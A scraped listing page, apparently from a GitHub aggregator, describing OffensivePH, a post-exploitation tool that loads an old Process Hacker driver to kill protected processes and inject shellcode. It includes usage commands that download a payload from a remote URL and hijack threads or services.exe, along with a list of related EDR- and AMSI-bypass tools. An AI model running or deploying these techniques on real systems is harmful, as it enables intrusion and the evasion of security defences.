OffensivePH - use old Process Hacker driver to bypass several user-mode access controls

Related tags

Miscellaneous driver injection post-exploitation ioctl ppl
Overview

offensiveph

OffensivePH is a post-exploitation tool that utilizes an old Process Hacker driver to bypass several user-mode access controls.

Usage

  • Compile OffensivePH with VS2019 (tested).
  • Execute with Admin privileges.
  • offensiveph.exe: Standalone tool that can be used as a shellcode loader or process killer.
  • Hook2Kph.dll: a DLL that can be injected into your process to redirect several standard API calls to IOCTLs. Tools like sRDI can be used to convert Hook2Kph.dll into shellcode and inject your attacker process.
  • OffensivePH will extract the old Process Hacker driver from its resource section into the current directory with the name kph.sys and create a service to install driver. After execution service and file should be deleted automatically.
offensivph.exe [-kill|-peb|-hijack|-apcinject] [<PID>] [<URL>]
	-kill		: Kill process (can kill PPLs)
	-peb		: Read PEB of a process
	-hijack		: Inject shellcode using thread execution hijacking
	-apcinject	: Inject shellcode into a new services.exe (WinTCB-PPL) instance
  • Kill processes
> offensiveph.exe -kill 8228
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[*] Trying to terminate pid: 8228
[+] KphTerminateProcess is SUCCESSFUL
[*] Service and file are removed
  • Inject shellcode by using Hijack Thread execution
> offensiveph.exe -hijack 8412 http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Connecting to URL for downloading payload
[+] Process 8412 thread is hijacked to execute payload
[*] Service and file are removed
  • Inject shellcode into a new services.exe instance
> offensiveph.exe -apcinject http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Process 652 token is duplicated as Impersonation Token!
[+] Connecting to URL for downloading payload
[+] Protected Shellcode Host Process: 6520
[*] Service and file are removed

References

This repo contains lots of codes and inspration from original Process Hacker code.

TODO

  • Reflective DLLs and C2 implementation
  • Hiding Kph Driver
You might also like...
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Bobby Cooke 238 Dec 9, 2022
Several single-file, cross-platform, public domain libraries for C/C++ that I use for learning / testing

HTC Several single-file, cross-platform, public domain libraries for C/C++ that I use for learning / testing (Not meant for production code). This is

Chris 19 Nov 5, 2022
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Wavestone - Cybersecurity & Digital Trust 846 Jan 2, 2023
Corsair LL Access driver abuse

CorsairLLeak Map physical addresses into userspace (RW), read/write MSRs, send/recieve data on I/O ports, and query/set bus configuration data with th

Arush Agarampur 21 Jun 27, 2022
If the button pressed esp will reset and App mode will on. App mode will on then led will on, network is connected led will off.

DHT22-to-Google-sheet-Reset-Using-ESP8266-LED-Switch If button pressed esp will reset and App mode will on. App mode will on then led will on, network

Md. Harun-Or-Rashid 3 Aug 17, 2022
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

anycall x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration Read: https://www.godeye.club/2021/05/14/0

Kento Oki 160 Dec 30, 2022
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

null 95 Sep 5, 2022
User-mode trap-and-emulate hypervisor for RISC-V

URVirt URVirt is a U-mode trap-and-emulate hypervisor for RISC-V. Related projects RVirt is an S-mode trap-and-emulate hypervisor for RISC-V. It runs

null 12 Sep 16, 2022
RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc
RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc

Introduction RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks,

Halil Dalabasmaz 411 Dec 26, 2022
Comments
  • Failed to connect KProcessHacker Driver

    Failed to connect KProcessHacker Driver

    C:\Users\max\Desktop>offensiveph.exe -kill 4952

    OffensivePH

    [*] Driver path: C:\Users\max\Desktop\kph.sys [-] Failed to connect KProcessHacker Driver. Exiting... [*] Service and file are removed C:\Users\max\Desktop>

    opened by wgetnz 9
Owner
Red Section
Red Section
GitHub
Loads a signed kernel driver which allows you to map any driver to kernel mode without any traces of the signed / mapped driver.

CosMapper Loads a signed kernel driver (signed with leaked cert) which allows you to map any driver to kernel mode without any traces of the signed /

null 157 Jan 2, 2023
ScriptHook Bypass For Fivem / bypass hardware ID For nvdia only

Fivem-Bypass ScriptHook Bypass For Fivem / bypass hardware ID For nvdia only Not Working? Run as admin and disable your antivirus. How to use 1. Put y

Sarnax 38 Dec 25, 2022
A user-mode emulator for the mhyprot2.sys driver

mhynot2 Cheating is bad, but I think requiring a kernel driver to play a (mostly) single-player game is worse. mhynot2 is a hook DLL which hooks into

Khangaroo 92 Dec 28, 2022
This repo contains example software for the Kernelcon 2021 Hack Live! badge - the Hacker HotKey.

Hacker HotKey This repo contains example software for the Kernelcon 2021 Hack Live! badge - the Hacker HotKey. Default Hotkey Mapping Hacker Hotkey is

Kernelcon 14 Jan 24, 2022
Remote hacker probe - Threat Emulation and Red Teaming Framework, The Hacking Software for normal people.

The Remote Hacker Probe is a Threat Emulation and Red Teaming Framework built to be easy to use. The Remote Hacker Probe is Feature Rich! Including, K

Fahad 180 Dec 27, 2022
Tools of The Trade, from Hacker News.

Hacker News Tools of the Trade Tools of The Trade, from Hacker News. Background In 2010, Joshua Schachter, the founder of Delicious, posted the follow

Chris Barber 15.8k Jan 7, 2023
Sloth 🦥 is a coverage guided fuzzing framework for fuzzing Android Native libraries that makes use of libFuzzer and QEMU user-mode emulation

Sloth ?? Sloth is a fuzzing setup that makes use of libFuzzer and QEMU’s user-mode emulation (qemu/linux-user) on x86_64/aarch64 host to emulate aarch

Chaithu 82 Nov 29, 2022
A tool to apply accent color to win32 controls.

AccentApplicator A tool to apply accent color to win32 controls. Works with Windows 10 only. Overall Progress Controls Button Checkbox Combobox Edit T

Rounak 13 Dec 11, 2022
Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Cobalt Strike BOF - Inject AMSI Bypass Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. Running inje

boku 307 Dec 28, 2022
Automatically inject a DLL into the selected process with VAC3 bypass.

FTP LOADER Automatically inject a DLL into the selected process with VAC3 bypass. This will only, most likely, work only with source engine games in s

null 18 Aug 26, 2021